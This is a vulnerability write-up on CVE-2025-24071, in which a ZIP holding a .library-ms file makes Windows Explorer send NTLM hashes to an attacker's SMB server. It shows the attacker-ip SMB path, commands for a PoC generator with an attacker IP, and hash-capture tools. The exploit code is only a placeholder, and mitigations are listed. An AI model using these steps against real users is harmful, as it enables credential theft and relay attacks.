Windows File Explorer NTLM Hash Disclosure via .library-ms Archive (CVE-2025-24071)
This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.
Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.
Disclosure status: Full Disclosure
CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.
Content *
Overview
A vulnerability tracked as CVE-2025-24071 affects Windows 10 and Windows 11 systems.
The issue occurs when Windows File Explorer processes a malicious .library-ms file contained within a ZIP archive.
When the archive is extracted, the operating system automatically attempts to connect to a remote SMB share specified in the file. This behavior results in an NTLM authentication request being sent to the attacker-controlled server.
As a result, the attacker may capture NTLM authentication hashes, which can then be used in relay attacks or offline password cracking.
Affected Systems
Vendor: Microsoft
Affected operating systems:
- Windows 10
- Windows 11
Tested environment:
- Windows 11 (23H2)
Technical Details
The vulnerability abuses the .library-ms file format used by Windows libraries.
A malicious .library-ms file may contain a remote SMB path such as:
\\attacker-ip\shared
When the file is extracted from a ZIP archive, Windows Explorer automatically resolves the network location.
This causes the victim system to initiate an SMB authentication request, which includes NTLM credentials in hashed form.
If the attacker controls the SMB server, they can capture these hashes using tools such as:
- Responder
- Impacket SMB server
- Metasploit SMB capture modules
Proof of Concept (PoC)
The following Python tool generates a malicious .library-ms file and packages it inside a ZIP archive.
# place your exploit code here
How the Exploit Works
The exploit tool performs the following steps:
- Generates a malicious
.library-msfile pointing to an attacker SMB server. - Packages the file into a ZIP archive.
- When the victim extracts the archive using Windows Explorer, the system attempts to access the remote SMB location.
- NTLM authentication is automatically sent to the attacker server.
Usage
Generate the malicious archive using the following command:
python3 CVE-2025-24071_tool.py -i <attacker-ip> -n payload -o ./output
Example:
python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n exploit -o ./output
Optional flag:
--keep
This option keeps the .library-ms file after ZIP creation.
Impact
Successful exploitation may allow attackers to:
- Capture NTLM authentication hashes
- Perform NTLM relay attacks
- Conduct offline password cracking
- Gain access to internal network resources
Mitigation
Recommended mitigation steps include:
- Disable NTLM authentication where possible
- Block outbound SMB traffic to external networks
- Apply Microsoft security updates
- Monitor network traffic for suspicious SMB connections
Researcher
Security research conducted by:
Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴
GitHub: https://github.com/mbanyamer
Disclaimer
This proof-of-concept is provided strictly for educational purposes and authorized security testing only. Unauthorized exploitation against systems without permission is illegal.
Disclosure: Full Disclosure
Comments
No comments yet. Be the first.
Leave a Comment